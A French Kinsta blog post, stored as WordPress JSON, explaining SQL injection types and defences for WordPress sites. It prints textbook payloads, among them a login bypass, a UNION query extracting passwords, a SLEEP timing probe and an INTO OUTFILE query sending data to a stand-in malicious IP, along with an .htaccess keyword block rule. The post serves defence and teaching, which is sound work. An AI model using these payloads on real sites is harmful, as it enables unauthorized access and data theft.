{"id":35985,"date":"2020-01-14T00:42:12","date_gmt":"2020-01-14T08:42:12","guid":{"rendered":"https:\/\/kinsta.com\/?p=62827"},"modified":"2023-10-02T15:16:24","modified_gmt":"2023-10-02T14:16:24","slug":"injections-sql","status":"publish","type":"post","link":"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/","title":{"rendered":"Injection SQL : Un guide d\u00e9taill\u00e9 pour les utilisateurs de WordPress"},"content":{"rendered":"<p>Une injection SQL est une technique d&rsquo;injection de code que les attaquants utilisent pour exploiter les vuln\u00e9rabilit\u00e9s de la couche base de donn\u00e9es d&rsquo;un site web ou d&rsquo;une application. Si les attaquants parviennent \u00e0 r\u00e9aliser une injection SQL, ils peuvent acc\u00e9der \u00e0 la base de donn\u00e9es.<\/p>\n<p>Si vous comprenez le fonctionnement de ces attaques, vous serez mieux \u00e9quip\u00e9 pour les pr\u00e9venir. Vous pourrez ainsi assurer la s\u00e9curit\u00e9 de votre site web et de vos clients.<\/p>\n<p>Dans cet article, nous allons explorer les diff\u00e9rents types d&rsquo;injections SQL. Nous vous montrerons \u00e9galement comment prot\u00e9ger votre site contre ces attaques. Plongeons dans le vif du sujet !<\/p>\n<div><\/div><kinsta-auto-toc heading=\"Table of Contents\" exclude=\"last\" list-style=\"arrow\" selector=\"h2\" count-number=\"-1\"><\/kinsta-auto-toc>\n<h2>Qu&rsquo;est-ce qu&rsquo;une injection SQL ?<\/h2>\n<p>SQL (Structured Query Language) est un langage qui nous permet d&rsquo;<a href=\"https:\/\/kinsta.com\/fr\/blog\/bases-de-donnees-wordpress\/\">interagir avec les bases de donn\u00e9es<\/a>. Les applications web modernes utilisent des bases de donn\u00e9es pour g\u00e9rer les donn\u00e9es et afficher un contenu dynamique aux lecteurs.<\/p>\n<p>On parle d&rsquo;injection SQL (ou SQLi) lorsqu&rsquo;un utilisateur tente d&rsquo;ins\u00e9rer des instructions SQL malveillantes dans une application web. S&rsquo;il y parvient, il pourra acc\u00e9der aux donn\u00e9es sensibles de la base de donn\u00e9es.<\/p>\n<p>En 2023, les injections SQL restent l&rsquo;une des attaques les plus courantes sur le web. Rien qu&rsquo;en 2022, <a href=\"https:\/\/www.cvedetails.com\/vulnerability-list\/year-2022\/opsqli-1\/sql-injection.html\" target=\"_blank\" rel=\"noopener noreferrer\">1162 vuln\u00e9rabilit\u00e9s li\u00e9es aux injections SQL<\/a> ont \u00e9t\u00e9 ajout\u00e9es \u00e0 la base de donn\u00e9es de s\u00e9curit\u00e9 CVE.<\/p>\n<p>La bonne nouvelle, c&rsquo;est que les injections SQL ne sont plus aussi r\u00e9pandues qu&rsquo;auparavant. La plupart des applications ont \u00e9volu\u00e9 pour se prot\u00e9ger contre les attaques SQL.<\/p>\n<p>En 2012, <a href=\"https:\/\/www.techworld.com\/news\/security\/barclays-97-percent-of-data-breaches-still-due-sql-injection-3331283\/\" target=\"_blank\" rel=\"noopener noreferrer\">97 % des violations de donn\u00e9es<\/a> \u00e9taient dues \u00e0 des injections SQL. Aujourd&rsquo;hui, ce chiffre reste \u00e9lev\u00e9, mais il est beaucoup plus facile \u00e0 g\u00e9rer.<\/p>\n<h2>Comment fonctionne la vuln\u00e9rabilit\u00e9 d&rsquo;injection SQL ?<\/h2>\n<p>Une vuln\u00e9rabilit\u00e9 par injection SQL donne \u00e0 un pirate un acc\u00e8s complet \u00e0 la base de donn\u00e9es de votre application gr\u00e2ce \u00e0 l&rsquo;utilisation d&rsquo;instructions SQL malveillantes.<\/p>\n<p>Prenons un exemple d&rsquo;application vuln\u00e9rable.<\/p>\n<p>Imaginez le flux de travail d&rsquo;une application web typique qui implique des requ\u00eates de base de donn\u00e9es par le biais d&rsquo;entr\u00e9es utilisateur. Vous saisissez les donn\u00e9es de l&rsquo;utilisateur au moyen d&rsquo;un formulaire, par exemple un formulaire de connexion. Vous interrogez ensuite votre base de donn\u00e9es avec les champs soumis par l&rsquo;utilisateur pour l&rsquo;authentifier. La structure de la requ\u00eate adress\u00e9e \u00e0 votre base de donn\u00e9es ressemble \u00e0 ceci :<\/p>\n<pre><code class=\"language-sql\">select * from user_table\nwhere username = 'sdaityari'\nand password = 'mypassword';<\/code><\/pre>\n<p>Pour simplifier, supposons que vous stockez vos mots de passe en texte clair. Il est toutefois recommand\u00e9 de <a href=\"https:\/\/kinsta.com\/fr\/blog\/salt-wordpress\/\">saler vos mots de passe<\/a>, puis de les hacher. Si vous avez re\u00e7u le nom d&rsquo;utilisateur et le mot de passe du formulaire, vous pouvez d\u00e9finir la requ\u00eate en PHP comme suit :<\/p>\n<pre><code class=\"language-php\">\/\/ Connect to SQL database\n$db_query = \"select * from user_table where\nusername = '\".$user.\"'\nAND password = '\".$password.\"';\";\n\/\/ Execute query<\/code><\/pre>\n<p>Si quelqu&rsquo;un saisit la valeur \u00ab admin&rsquo;;- \u00bb dans le champ du nom d&rsquo;utilisateur, la requ\u00eate SQL g\u00e9n\u00e9r\u00e9e par la variable $db_query sera la suivante :<\/p>\n<pre><code class=\"language-sql\">select * from user_table where\nusername = 'admin';--' and password = 'mypassword'<\/code><\/pre>\n<p>Que fait cette requ\u00eate ?<\/p>\n<p>En SQL, le symbole &#8212; commence un commentaire, de sorte que tout ce qui suit est ignor\u00e9. La v\u00e9rification du mot de passe est donc supprim\u00e9e de la requ\u00eate. Par cons\u00e9quent, si \u00ab admin \u00bb est un nom d&rsquo;utilisateur valide, l&rsquo;attaquant peut se connecter sans conna\u00eetre le mot de passe. Du moins, s&rsquo;il n&rsquo;y a pas de s\u00e9curit\u00e9 en place contre ce type d&rsquo;attaques.<\/p>\n<p>Dans cet exemple, une attaque bool\u00e9enne peut \u00e9galement \u00eatre utilis\u00e9e pour obtenir l&rsquo;acc\u00e8s. Si un pirate saisit \u00ab password&rsquo; or 1=1;- \u00bb dans le champ du mot de passe, la requ\u00eate r\u00e9sultante sera la suivante :<\/p>\n<pre><code class=\"language-sql\">select * from user_table where\nusername = 'admin' and\npassword = 'password' or 1=1;--';<\/code><\/pre>\n<p>Dans ce cas, m\u00eame si votre mot de passe est erron\u00e9, vous serez authentifi\u00e9 dans l&rsquo;application. Si votre page web affiche les r\u00e9sultats de l&rsquo;interrogation de la base de donn\u00e9es, un pirate peut utiliser la commande pour afficher les tables, la commande pour afficher les tables de la base de donn\u00e9es, puis supprimer s\u00e9lectivement des tables s&rsquo;il le souhaite.<\/p>\n<figure>\n<p><figure style=\"width: 666px\" class=\"wp-caption alignnone\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/kinsta.com\/wp-content\/uploads\/2023\/09\/sql-injection-cartoon.png\" alt=\"Une bande dessin\u00e9e sur l'injection SQL\" width=\"666\" height=\"205\"><figcaption class=\"wp-caption-text\">Une bande dessin\u00e9e sur l&rsquo;injection SQL (<strong>Source :<\/strong> <a href=\"https:\/\/xkcd.com\/327\/\" target=\"_blank\" rel=\"noopener noreferrer\">XKCD<\/a>)<\/figcaption><\/figure><\/figure>\n<p>Exploits of a Mom, une bande dessin\u00e9e populaire de XKCD, montre la conversation d&rsquo;une m\u00e8re avec l&rsquo;\u00e9cole de son fils, o\u00f9 on lui demande si elle a vraiment appel\u00e9 son fils \u00ab Robert&rsquo;) ; DROP TABLE Students ; &#8211; \u00bb\u00ab .<\/p>\n<h2>Types d&rsquo;injection SQL<\/h2>\n<p>Maintenant que vous connaissez les bases d&rsquo;une vuln\u00e9rabilit\u00e9 par injection SQL, explorons les diff\u00e9rents types d&rsquo;attaques par injection SQL et la raison de chacune d&rsquo;entre elles.<\/p>\n<h3>Injection SQL en bande<\/h3>\n<p>L&rsquo;injection SQL en bande est la forme la plus simple d&rsquo;injection SQL. Dans ce processus, l&rsquo;attaquant est capable d&rsquo;utiliser le m\u00eame canal pour ins\u00e9rer le code SQL malveillant dans l&rsquo;application et recueillir les r\u00e9sultats.<\/p>\n<p>Examinons deux formes d&rsquo;attaques par injection SQL en bande.<\/p>\n<h4>Attaque par erreur<\/h4>\n<p>Une attaque par erreur se produit lorsque quelqu&rsquo;un manipule intentionnellement la requ\u00eate SQL pour g\u00e9n\u00e9rer une erreur dans la base de donn\u00e9es. Le message d&rsquo;erreur renvoy\u00e9 par la base de donn\u00e9es contient souvent des informations sur la structure de la base de donn\u00e9es, que l&rsquo;attaquant peut utiliser pour exploiter davantage le syst\u00e8me.<\/p>\n<p>Par exemple, un pirate peut saisir &lsquo; OR &lsquo;1&rsquo;=&rsquo;1 dans un champ de formulaire. Si l&rsquo;application est vuln\u00e9rable, elle peut renvoyer un message d&rsquo;erreur qui r\u00e9v\u00e8le des informations sur la base de donn\u00e9es.<\/p>\n<h4>Attaque bas\u00e9e sur l&rsquo;union<\/h4>\n<p>Les attaques par injection SQL bas\u00e9es sur l&rsquo;union utilisent l&rsquo;op\u00e9rateur SQL UNION pour combiner les r\u00e9sultats de la requ\u00eate originale avec les r\u00e9sultats de requ\u00eates malveillantes inject\u00e9es.<\/p>\n<p>Cela permet \u00e0 l&rsquo;attaquant de r\u00e9cup\u00e9rer des informations dans d&rsquo;autres tables de la base de donn\u00e9es :<\/p>\n<pre><code class=\"language-sql\">select title, link from post_table\nwhere id &lt; 10\nunion\nselect username, password\nfrom user_table; --;<\/code><\/pre>\n<p>Dans cette requ\u00eate, l&rsquo;op\u00e9rateur UNION combine les r\u00e9sultats de la requ\u00eate originale avec les r\u00e9sultats de <em>SELECT username<\/em>, <em>password<\/em> <em>FROM user_table<\/em>. Si l&rsquo;application est vuln\u00e9rable et ne v\u00e9rifie pas correctement les entr\u00e9es des utilisateurs, elle peut renvoyer une page contenant les noms d&rsquo;utilisateur et les mots de passe de la table des utilisateurs.<\/p>\n<h2>Injection SQL inf\u00e9rentielle (injection SQL aveugle)<\/h2>\n<p>M\u00eame si un attaquant g\u00e9n\u00e8re une erreur dans la requ\u00eate SQL, la r\u00e9ponse \u00e0 la requ\u00eate peut ne pas \u00eatre transmise directement \u00e0 la page web. Dans ce cas, l&rsquo;auteur de l&rsquo;attaque devra proc\u00e9der \u00e0 d&rsquo;autres v\u00e9rifications.<\/p>\n<p>Dans cette forme d&rsquo;injection SQL, l&rsquo;attaquant envoie diverses requ\u00eates \u00e0 la base de donn\u00e9es afin d&rsquo;\u00e9valuer la mani\u00e8re dont l&rsquo;application analyse ces r\u00e9ponses. Une injection SQL inf\u00e9rentielle est parfois \u00e9galement connue sous le nom d&rsquo;injection SQL aveugle.<\/p>\n<p>Nous examinerons ci-dessous deux types d&rsquo;injections SQL inf\u00e9rentielles, \u00e0 savoir l&rsquo;injection SQL bool\u00e9enne et l&rsquo;injection SQL temporelle : l&rsquo;injection SQL bool\u00e9enne et l&rsquo;injection SQL temporelle.<\/p>\n<h4>Attaque bool\u00e9enne<\/h4>\n<p>Si une requ\u00eate SQL entra\u00eene une erreur qui n&rsquo;a pas \u00e9t\u00e9 trait\u00e9e en interne dans l&rsquo;application, la page web r\u00e9sultante peut g\u00e9n\u00e9rer une erreur, charger une page blanche ou se charger partiellement. Dans une injection SQL bool\u00e9enne, un attaquant \u00e9value quelles parties de l&rsquo;entr\u00e9e d&rsquo;un utilisateur sont vuln\u00e9rables aux injections SQL en essayant deux versions diff\u00e9rentes d&rsquo;une clause bool\u00e9enne \u00e0 travers l&rsquo;entr\u00e9e :<\/p>\n<ul>\n<li>\u00ab &#8230; et 1=1\u00bb<\/li>\n<li>\u00ab &#8230; et 1=2 \u00bb<\/li>\n<\/ul>\n<p>Ces requ\u00eates sont con\u00e7ues pour avoir une condition qui sera soit vraie, soit fausse. Si la condition est vraie, la page se chargera normalement. Si elle est fausse, la page peut se charger diff\u00e9remment ou afficher une erreur.<\/p>\n<p>En observant le chargement de la page, l&rsquo;attaquant peut d\u00e9terminer si la condition \u00e9tait vraie ou fausse, m\u00eame s&rsquo;il ne voit pas la requ\u00eate SQL r\u00e9elle ou la r\u00e9ponse de la base de donn\u00e9es. Si vous r\u00e9unissez plusieurs conditions similaires, vous pouvez lentement extraire des informations de la base de donn\u00e9es.<\/p>\n<h4>Attaque temporelle<\/h4>\n<p>Une attaque par injection SQL bas\u00e9e sur le temps peut aider un attaquant \u00e0 <a href=\"https:\/\/kinsta.com\/fr\/docs\/information-service\/divulguer-securite-vulnerabilite\/\">d\u00e9terminer si une vuln\u00e9rabilit\u00e9 est pr\u00e9sente<\/a> dans une application web. Un attaquant utilise une fonction temporelle pr\u00e9d\u00e9finie du syst\u00e8me de gestion de base de donn\u00e9es utilis\u00e9 par l&rsquo;application. Par exemple, <a href=\"https:\/\/kinsta.com\/fr\/blog\/qu-est-ce-que-mysql\/\">dans MySQL<\/a>, la <a href=\"http:\/\/dev.mysql.com\/doc\/refman\/5.0\/en\/miscellaneous-functions.html#function_sleep\" target=\"_blank\" rel=\"noopener noreferrer\">fonction<em>sleep()<\/em><\/a> demande \u00e0 la base de donn\u00e9es d&rsquo;attendre un certain nombre de secondes.<\/p>\n<pre><code class=\"language-sql\">select * from comments\nWHERE post_id=1-SLEEP(15);<\/code><\/pre>\n<p>Si une telle requ\u00eate entra\u00eene un d\u00e9lai, l&rsquo;attaquant saura qu&rsquo;elle est vuln\u00e9rable. Cette approche est similaire aux attaques bool\u00e9ennes dans la mesure o\u00f9 vous n&rsquo;obtenez pas de r\u00e9ponse r\u00e9elle de la base de donn\u00e9es. Cependant, vous pouvez obtenir des informations si l&rsquo;attaque r\u00e9ussit.<\/p>\n<h2>Injection SQL hors bande<\/h2>\n<p>Dans une attaque par injection SQL hors bande, l&rsquo;attaquant manipule la requ\u00eate SQL pour demander \u00e0 la base de donn\u00e9es de transmettre des donn\u00e9es \u00e0 un serveur contr\u00f4l\u00e9 par l&rsquo;attaquant. Pour ce faire, il utilise g\u00e9n\u00e9ralement des fonctions de base de donn\u00e9es qui peuvent demander des ressources externes, telles que des requ\u00eates HTTP ou des requ\u00eates DNS.<\/p>\n<p>Une attaque par injection SQL hors bande utilise une capacit\u00e9 de processus de fichier externe de votre SGBD. Dans MySQL, les fonctions LOAD_FILE() et INTO OUTFILE peuvent \u00eatre utilis\u00e9es pour demander \u00e0 MySQL de transmettre les donn\u00e9es \u00e0 une source externe.<\/p>\n<p>Voici comment un attaquant peut utiliser OUTFILE pour envoyer les r\u00e9sultats d&rsquo;une requ\u00eate \u00e0 une source externe :<\/p>\n<pre><code class=\"language-sql\">select * from post_table\ninto OUTFILE '\\\\MALICIOUS_IP_ADDRESSlocation'<\/code><\/pre>\n<p>De m\u00eame, la fonction LOAD_FILE() peut \u00eatre utilis\u00e9e pour lire un fichier sur le serveur et afficher son contenu. Une combinaison de LOAD_FILE() et OUTFILE peut \u00eatre utilis\u00e9e pour lire le contenu d&rsquo;un fichier sur le serveur et le transmettre \u00e0 un autre emplacement.<\/p>\n<h2>Comment pr\u00e9venir les injections SQL<\/h2>\n<p>Jusqu&rsquo;\u00e0 pr\u00e9sent, nous avons explor\u00e9 les vuln\u00e9rabilit\u00e9s d&rsquo;une application web qui peuvent conduire \u00e0 des attaques par injection SQL. Une vuln\u00e9rabilit\u00e9 de type injection SQL peut \u00eatre utilis\u00e9e par un attaquant pour lire, modifier ou m\u00eame supprimer le contenu de votre base de donn\u00e9es.<\/p>\n<p>En outre, elle peut \u00e9galement permettre de lire un fichier \u00e0 n&rsquo;importe quel endroit du serveur et d&rsquo;en transf\u00e9rer le contenu ailleurs. Dans cette section, nous explorons diff\u00e9rentes techniques pour prot\u00e9ger votre application web et votre site web contre les attaques par injection SQL.<\/p>\n<h3>\u00c9chapper les entr\u00e9es de l&rsquo;utilisateur<\/h3>\n<p>D&rsquo;une mani\u00e8re g\u00e9n\u00e9rale, il est difficile de d\u00e9terminer si une cha\u00eene de caract\u00e8res utilisateur est malveillante ou non. C&rsquo;est pourquoi une approche courante consiste \u00e0 \u00e9chapper les caract\u00e8res sp\u00e9ciaux dans les entr\u00e9es utilisateur. Ce processus peut vous aider \u00e0 vous prot\u00e9ger contre les attaques par injection SQL.<\/p>\n<p>En PHP, vous pouvez \u00e9chapper une cha\u00eene de caract\u00e8res avant de construire la requ\u00eate \u00e0 l&rsquo;aide de la fonction <code>mysqli_real_escape_string()<\/code>:<\/p>\n<pre><code class=\"language-sql\">$unsafe_variable = $_POST[\"user_input\"]; $safe_variable = mysqli_real_escape_string($conn, $unsafe_variable);<\/code><\/pre>\n<p>Lorsque vous affichez des donn\u00e9es utilisateur au format HTML, il est \u00e9galement important de convertir les caract\u00e8res sp\u00e9ciaux en caract\u00e8res HTML correspondants afin de pr\u00e9venir les attaques de type Cross-Site Scripting (XSS). Vous pouvez convertir les caract\u00e8res sp\u00e9ciaux en PHP en utilisant la fonction <code>htmlspecialchars()<\/code>.<\/p>\n<h3>Utiliser des instructions pr\u00e9par\u00e9es<\/h3>\n<p>Vous pouvez \u00e9galement utiliser des instructions pr\u00e9par\u00e9es pour \u00e9viter les injections SQL. Une instruction pr\u00e9par\u00e9e est un mod\u00e8le de requ\u00eate SQL, dans lequel vous sp\u00e9cifiez des param\u00e8tres \u00e0 un stade ult\u00e9rieur pour l&rsquo;ex\u00e9cuter.<\/p>\n<p>Voici un exemple d&rsquo;instruction pr\u00e9par\u00e9e en PHP et MySQLi :<\/p>\n<pre><code class=\"language-php\">$query = $mysql_connection-&gt;prepare(\"select * from user_table where username = ? and password = ?\");\n$query-&gt;execute(array($username, $password));<\/code><\/pre>\n<h3>Autres contr\u00f4les d&rsquo;hygi\u00e8ne pour pr\u00e9venir les attaques SQL<\/h3>\n<p>L&rsquo;\u00e9tape suivante pour att\u00e9nuer cette vuln\u00e9rabilit\u00e9 consiste \u00e0 limiter l&rsquo;acc\u00e8s \u00e0 la base de donn\u00e9es au strict n\u00e9cessaire.<\/p>\n<p>Par exemple, vous pouvez connecter votre application web au SGBD en utilisant un utilisateur sp\u00e9cifique qui n&rsquo;a acc\u00e8s qu&rsquo;\u00e0 la base de donn\u00e9es concern\u00e9e.<\/p>\n<p>En outre, vous voudrez restreindre l&rsquo;acc\u00e8s de l&rsquo;utilisateur de la base de donn\u00e9es \u00e0 tous les autres emplacements du serveur. Vous pouvez \u00e9galement souhaiter bloquer certains mots-cl\u00e9s SQL dans votre URL via votre serveur web.<\/p>\n<p>Si vous <a href=\"https:\/\/kinsta.com\/fr\/blog\/nginx-vs-apache\/\">utilisez Apache<\/a> comme serveur web, vous pouvez utiliser les lignes de code suivantes dans votre fichier <em><a href=\"https:\/\/kinsta.com\/fr\/blog\/fichier-htaccess-wordpress\/\">.htaccess<\/a><\/em> pour afficher une <a href=\"https:\/\/kinsta.com\/fr\/blog\/erreur-403-forbidden\/#:~:text=The%20403%20Forbidden%20error%20means%20that%20your%20server%20is%20working,file%20permissions%20or%20.htaccess%20file.\">erreur<em>403 Forbidden<\/em><\/a> \u00e0 un attaquant potentiel.<\/p>\n<p>Soyez prudent avant d&rsquo;utiliser cette technique, car Apache affichera une erreur \u00e0 un lecteur si l&rsquo;URL contient ces mots-cl\u00e9s.<\/p>\n<pre><code>RewriteCond %{QUERY_STRING} [^a-z](declare\u00a6char\u00a6set\u00a6cast\u00a6convert\u00a6delete\u00a6drop\u00a6exec\u00a6insert\u00a6meta\u00a6script\u00a6select\u00a6truncate\u00a6update)[^a-z] [NC]\nRewriteRule (.*) - [F]<\/code><\/pre>\n<aside role=\"note\" class=\"wp-block-kinsta-notice is-style-info\">\n            <h3>Info<\/h3>\n        <p>Kinsta utilise WordPress sur le serveur web Nginx, qui ne supporte pas de fichier .htaccess. Si vous souhaitez mettre en place une r\u00e8gle pour bloquer les mots-cl\u00e9s sur votre URL, contactez l&rsquo;\u00e9quipe de support de Kinsta qui pourra vous aider.<\/p>\n<\/aside>\n\n<p>Un autre conseil de pr\u00e9vention consiste \u00e0 toujours <a href=\"https:\/\/kinsta.com\/fr\/blog\/wordpress-pirate\/#2-keep-your-site-updated\">utiliser des logiciels mis \u00e0 jour<\/a>. Lorsqu&rsquo;une nouvelle version ou un correctif est publi\u00e9, les bogues qui ont \u00e9t\u00e9 corrig\u00e9s dans la mise \u00e0 jour sont d\u00e9taill\u00e9s dans les notes de mise \u00e0 jour. Une fois que les d\u00e9tails d&rsquo;un bogue sont rendus publics, il peut \u00eatre risqu\u00e9 d&rsquo;utiliser une ancienne version d&rsquo;un logiciel.<\/p>\n<h2>Injection SQL dans WordPress<\/h2>\n<p>Vous \u00eates \u00e0 l&rsquo;abri de toute vuln\u00e9rabilit\u00e9 d&rsquo;injection SQL si vous utilisez des fichiers de base WordPress \u00e0 jour. Cependant, l&rsquo;utilisation d&rsquo;extensions et de th\u00e8mes tiers expose toujours votre site web \u00e0 un certain niveau de vuln\u00e9rabilit\u00e9. Vous pouvez largement att\u00e9nuer ce risque en utilisant des extensions et des th\u00e8mes qui re\u00e7oivent des mises \u00e0 jour r\u00e9guli\u00e8res et qui respectent des pratiques de codage s\u00fbres.<\/p>\n<p>La solidit\u00e9 de votre site WordPress d\u00e9pend de son maillon le plus faible. Dans cette section, nous explorons les consid\u00e9rations cl\u00e9s pour att\u00e9nuer la vuln\u00e9rabilit\u00e9 \u00e0 l&rsquo;injection SQL dans WordPress et comment effectuer des contr\u00f4les de vuln\u00e9rabilit\u00e9 sur votre site WordPress existant.<\/p>\n<h3>Pr\u00e9vention de la vuln\u00e9rabilit\u00e9 aux injections SQL pour WordPress<\/h3>\n<p>Pour r\u00e9duire la vuln\u00e9rabilit\u00e9 \u00e0 l&rsquo;injection SQL dans votre <a href=\"https:\/\/kinsta.com\/fr\/blog\/theme-wordpress-plus-rapide\/\">th\u00e8me WordPress<\/a> ou votre extension, la seule r\u00e8gle \u00e0 suivre est de toujours utiliser les fonctions existantes de WordPress pour interagir avec la base de donn\u00e9es.<\/p>\n<p>Ces fonctions sont test\u00e9es de mani\u00e8re approfondie pour d\u00e9tecter les vuln\u00e9rabilit\u00e9s aux injections SQL au cours du processus de d\u00e9veloppement de WordPress. Par exemple, si vous souhaitez ajouter un commentaire \u00e0 un article, utilisez la fonction <em><a href=\"https:\/\/developer.wordpress.org\/reference\/functions\/wp_insert_comment\/\" target=\"_blank\" rel=\"noopener noreferrer\">wp_insert_comment()<\/a><\/em> plut\u00f4t que d&rsquo;ins\u00e9rer des donn\u00e9es directement dans la table <em>wp_comments<\/em>.<\/p>\n<p>Bien que les fonctions soient extensibles, il se peut que vous ayez parfois besoin d&rsquo;ex\u00e9cuter une requ\u00eate complexe. Dans ce cas, assurez-vous d&rsquo;utiliser le <a href=\"https:\/\/developer.wordpress.org\/reference\/classes\/wpdb\/\" target=\"_blank\" rel=\"noopener noreferrer\">groupe de fonctions<em>$wp_db<\/em><\/a>. Vous pouvez utiliser <em>$wpdb-&gt;prepare()<\/em> pour \u00e9chapper \u00e0 la saisie de l&rsquo;utilisateur avant de cr\u00e9er la requ\u00eate.<\/p>\n<p>De plus, voici une liste de fonctions permettant d&rsquo;<a href=\"https:\/\/developer.wordpress.org\/themes\/theme-security\/data-sanitization-escaping\/\" target=\"_blank\" rel=\"noopener noreferrer\">assainir les donn\u00e9es dans WordPress<\/a>. Celles-ci peuvent vous aider \u00e0 \u00e9chapper \u00e0 des types sp\u00e9cifiques d&rsquo;entr\u00e9es utilisateur telles que les e-mails et les URL.<\/p>\n<h2>S\u00e9curisez votre site WordPress<\/h2>\n<p>Bien que <a href=\"https:\/\/kinsta.com\/fr\/blog\/wordpress-est-il-securise\/\">WordPress lui-m\u00eame soit s\u00e9curis\u00e9<\/a>, des probl\u00e8mes tels qu&rsquo;un logiciel de base obsol\u00e8te et des <a href=\"https:\/\/kinsta.com\/fr\/blog\/plugins-themes-wordpress-nulled\/\">extensions non valides<\/a> peuvent conduire \u00e0 des vuln\u00e9rabilit\u00e9s. Bien qu&rsquo;il n&rsquo;y ait pas d&rsquo;alternative \u00e0 la v\u00e9rification compl\u00e8te de votre site WordPress pour les vuln\u00e9rabilit\u00e9s d&rsquo;injection SQL, la complexit\u00e9 d&rsquo;un site web peut rendre cette t\u00e2che difficile.<\/p>\n<p>Vous pouvez utiliser un outil d&rsquo;analyse en ligne tel que <a href=\"https:\/\/wpscan.org\/\" target=\"_blank\" rel=\"noopener noreferrer\">WPScan<\/a>. Nous vous recommandons \u00e9galement d&rsquo;auditer vos extensions pour voir si leur d\u00e9veloppement s&rsquo;est arr\u00eat\u00e9. Si elles ne sont plus maintenues, ce n&rsquo;est peut-\u00eatre pas une bonne id\u00e9e de les utiliser sur votre site.<\/p>\n<p>Si vous devez toujours les utiliser, assurez-vous de tester minutieusement leur code et leurs fonctionnalit\u00e9s pour d\u00e9tecter les vuln\u00e9rabilit\u00e9s. Pour le reste, veillez \u00e0 respecter les r\u00e8gles d&rsquo;hygi\u00e8ne suivantes :<\/p>\n<ul>\n<li>Mettez \u00e0 jour PHP, le noyau de WordPress et MySQL<\/li>\n<li>Mettez \u00e0 jour les extensions et les th\u00e8mes tiers<\/li>\n<li>\u00c9vitez d&rsquo;utiliser l&rsquo;utilisateur root pour vous connecter \u00e0 la base de donn\u00e9es SQL<\/li>\n<li>Limitez l&rsquo;acc\u00e8s de l&rsquo;utilisateur SQL aux r\u00e9pertoires sensibles<\/li>\n<li>Bloquez l&rsquo;utilisation de mots-cl\u00e9s SQL sur votre serveur<\/li>\n<li>Conservez des sauvegardes de votre site hors site en cas de dommages irr\u00e9versibles<\/li>\n<\/ul>\n<p>Vous trouverez ici un article d\u00e9taill\u00e9 sur la <a href=\"https:\/\/kinsta.com\/fr\/blog\/securite-wordpress\/\">s\u00e9curit\u00e9 de WordPress<\/a> et une liste exhaustive de v\u00e9rifications. En outre, vous pouvez investir dans ces <a href=\"https:\/\/kinsta.com\/fr\/blog\/plugins-securite-wordpress\/\">meilleures extensions WordPress de s\u00e9curit\u00e9<\/a>. Voici ce que vous devez faire si votre <a href=\"https:\/\/kinsta.com\/fr\/blog\/wordpress-pirate\/\">site WordPress est pirat\u00e9<\/a> malgr\u00e9 tous vos efforts.<\/p>\n<aside role=\"note\" class=\"wp-block-kinsta-notice is-style-info\">\n            <h3>Info<\/h3>\n        <p>Tous les sites WordPress h\u00e9berg\u00e9s chez Kinsta sont derri\u00e8re Cloudflare, avec des mesures de s\u00e9curit\u00e9 de niveau entreprise et des outils inclus dans leur plan.<\/p>\n<\/aside>\n\n<h2>L&rsquo;injection SQL est-elle ill\u00e9gale ?<\/h2>\n<p>Certainement, oui ! M\u00eame s&rsquo;il y a une vuln\u00e9rabilit\u00e9 r\u00e9elle, un attaquant essaie toujours d&rsquo;acc\u00e9der \u00e0 des donn\u00e9es qui ne lui seraient pas accessibles autrement.<\/p>\n<p>Imaginez un sc\u00e9nario dans lequel quelqu&rsquo;un laisse ses cl\u00e9s dans la voiture. Le fait de partir en voiture constitue-t-il une infraction simplement parce qu&rsquo;elle a \u00e9t\u00e9 laiss\u00e9e ouverte et sans surveillance ?<\/p>\n<p>L&rsquo;acte de SQLi rel\u00e8ve de lois diff\u00e9rentes selon les pays. Il rel\u00e8ve du <a href=\"https:\/\/www.justice.gov\/sites\/default\/files\/criminal-ccips\/legacy\/2015\/01\/14\/ccmanual.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Computer Fraud and Abuse Act<\/a> (1986) aux \u00c9tats-Unis et du <a href=\"http:\/\/www.legislation.gov.uk\/ukpga\/1990\/18\/contents\" target=\"_blank\" rel=\"noopener noreferrer\">Computer Misuse Act<\/a> (1990) au Royaume-Uni.<\/p>\n<h2>R\u00e9sum\u00e9<\/h2>\n<p>Les injections SQL sont depuis longtemps l&rsquo;une des attaques les plus courantes contre tous les types de sites web. M\u00eame WordPress ne peut pas vous prot\u00e9ger contre les attaques SQL si vous ne prenez pas les mesures n\u00e9cessaires pour assurer la s\u00e9curit\u00e9 de votre site web.<\/p>\n<p>Pour pr\u00e9venir ces attaques, vous devez :<\/p>\n<ul>\n<li>Comprendre comment fonctionne la vuln\u00e9rabilit\u00e9 de l&rsquo;injection SQL<\/li>\n<li>Explorer les diff\u00e9rentes fa\u00e7ons dont les attaquants peuvent utiliser SQLi pour obtenir un acc\u00e8s non autoris\u00e9 \u00e0 votre application web<\/li>\n<li>Mettre en \u0153uvre des m\u00e9thodes pour prot\u00e9ger votre site web contre les attaques SQLi, comme l&rsquo;\u00e9chappement des entr\u00e9es utilisateur et l&rsquo;utilisation d&rsquo;instructions pr\u00e9par\u00e9es<\/li>\n<li>Suivre une routine de contr\u00f4le de s\u00e9curit\u00e9<\/li>\n<\/ul>\n<p>Gagnez du temps et de l&rsquo;argent, et maximisez les performances de votre site, avec plus de 275 $ d&rsquo;int\u00e9grations de niveau entreprise incluses dans chaque plan WordPress infog\u00e9r\u00e9. Cela inclut un CDN de haute performance, une protection DDoS, une att\u00e9nuation des logiciels malveillants et des piratages, un cache edge, et les machines CPU les plus rapides de Google. Commencez sans contrat \u00e0 long terme, avec des migrations assist\u00e9es et une garantie de remboursement de 30 jours.<\/p>\n<p><a href=\"https:\/\/kinsta.com\/fr\/hebergement-wordpress\/\">Consultez nos offres<\/a> ou contactez le service commercial pour trouver l&rsquo;offre qui vous convient le mieux.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Une injection SQL est une technique d&rsquo;injection de code que les attaquants utilisent pour exploiter les vuln\u00e9rabilit\u00e9s de la couche base de donn\u00e9es d&rsquo;un site web &#8230;<\/p>\n","protected":false},"author":118,"featured_media":35988,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_kinsta_gated_content":false,"_kinsta_gated_content_redirect":"","footnotes":""},"tags":[213,269],"topic":[1028],"class_list":["post-35985","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","tag-securite-du-site","tag-wordpresshack","topic-developpement-wordpress"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v24.6 (Yoast 